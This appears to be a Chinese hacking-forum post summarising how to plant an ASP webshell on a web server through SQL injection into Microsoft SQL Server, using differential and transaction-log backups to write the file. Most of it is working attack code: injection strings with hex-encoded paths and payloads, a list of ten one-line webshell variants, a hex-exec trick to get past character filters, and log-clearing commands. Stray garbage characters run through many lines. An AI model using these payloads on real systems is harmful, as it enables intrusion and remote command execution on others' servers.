MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
- D4 B! E7 i7 P( r  }) n9 h/ M% qbackup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
3 u+ Y: J* M. h& qcreate table [dbo].[dtest] ([cmd] [image]);
7 n7 {1 a6 D! m+ v* I. ^insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--

3.进行差异备份
& Z5 B; f* P1 _; p! m4 Pbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

上面
0x3C25657865637574652872657175657374282261222929253E
( k' S0 w8 b. e7 c, L7 T" I就是一句话木马的内容：<%execute(request("a"))%>

: v+ {. n6 s2 a. i5 j如下是网上常见的差异备份代码，思路一样！
===================================================
: z# i6 O% u0 n7 P: I利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:

$ P- L  P# Z5 C6 B  fdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

& g$ M1 o9 H  k- I% N( Ycreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表


& d- G7 i6 O1 O, \. t) j1 I7 zinsert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
) b9 j1 Q: H* ~' S. C1 a$ w( O  ?9 h
- [" I% e# a9 X6 t: Ldeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
, d' {, j! |* P, E  r5 r: y  J
: E$ z# f* l" y% s4 @& f! gdrop table [xiaolu]  -- 删除此表。

0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
* x3 Q5 _! J6 R5 A, a& D0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
% C6 Y, J- `. }" L: [
. c/ T# ^" ^' i8 V. W声明：方法不是我想的，我只是写工具，默认得到shell是
. g, a3 q$ O( K3 `<%execute(request("a"))%>
/ a( M+ e0 d/ H7 ^! g/ G! X6 b* p===============================================================
2 a2 o: t# E8 l' h" g
我发现上面代码，有时会无效，而直接用

3 w# I$ L2 `' Q3 V9 ?backup database 库名 to disk = 'c:\ddd.bak'
& k/ ~& F/ Q5 C
create table [dbo].[dtest] ([cmd] [image]);
* {- r! F" U+ V- l6 I
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
$ V6 J/ o9 O; k8 X. H
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

, }4 I6 ^8 a8 R+ x; h( T库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

网上还有log增量备份的，我也把他记录一下
=====================================================
* S. ?' ?8 O! W另一种log增量备份技术:

';alter database null set RECOVERY FULL--

- K% x  P. o$ s';create table cmd (a image)--

';backup log null to disk = 'f:\cmd' with init--
$ g6 L% R* u5 D
';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

';backup log null to disk = '备份路径'--

! t; n/ S7 d* j' ~; J2 z+ T& n4 _1 {';drop table cmd--

% _" X8 n9 c( y3 [8 f';alter database XXX set RECOVERY SIMPLE--

; _: K6 f, j  S# `- p  \. HPS:0x3C2565786563757465287265717565737428226122292
* q! a! i' j5 Z. V( f9253EDA 是一句话小马16进制转来的

说到一句话马，还可以有这么几种写法：

a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
/ B8 e+ `2 K. U- @- ce)<%25Execute(request("a"))%25>
' W) C, Q2 i  t; i: K3 l/ af)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
+ A: {" u6 C; d; P" Eh)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
, T" t7 N  H3 b* }. k5 v: W1 aI)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

=============================================

1 ~/ e" D) _' m& Y# t& W, K当遇到差备过滤了/时用这个语句代替

: a0 N3 O! v5 ]5 e3 v! ndeclare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
6 A( v+ s6 ?$ |( I$ V6 [
把要执行的语句转16进制然后用exec执行


: c$ k8 t9 u0 s+ |7 |减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
id=1;backup database model to disk='你的路径‘ with differential,format;--
' B. c6 `7 \' s& e, T5 k
, z7 W# V5 S( a1 G& T0 i, H4 Q6 g
1 V0 q3 L, q0 ?# p/ f3 n) |  l
SQL语句清理日志
4 G2 }: P7 @) |! s  G+ g2 d注：test为数据库名
5 k+ M  J5 L* h
--清空日志
" ^: O  R4 k; Y* J  G5 bDUMP TRANSACTION test WITH NO_LOG

& O- K4 P& G( X& N' C--截断事务日志
+ ]/ _$ t& H  t! t1 a) a0 C' e+ K4 yBACKUP LOG test WITH NO_LOG
7 j4 l) K" V% R/ I
& F+ p% X; V; Y9 y0 ?$ L& A--收缩数据库
2 [7 z8 P  C+ u- I7 T; xDBCC SHRINKDATABASE(test)

5 E% p2 j* F3 o, F) S: o$ {6 U7 A--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
+ N4 T6 Z7 Y7 }) G0 b2 U- D7 @( x
--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'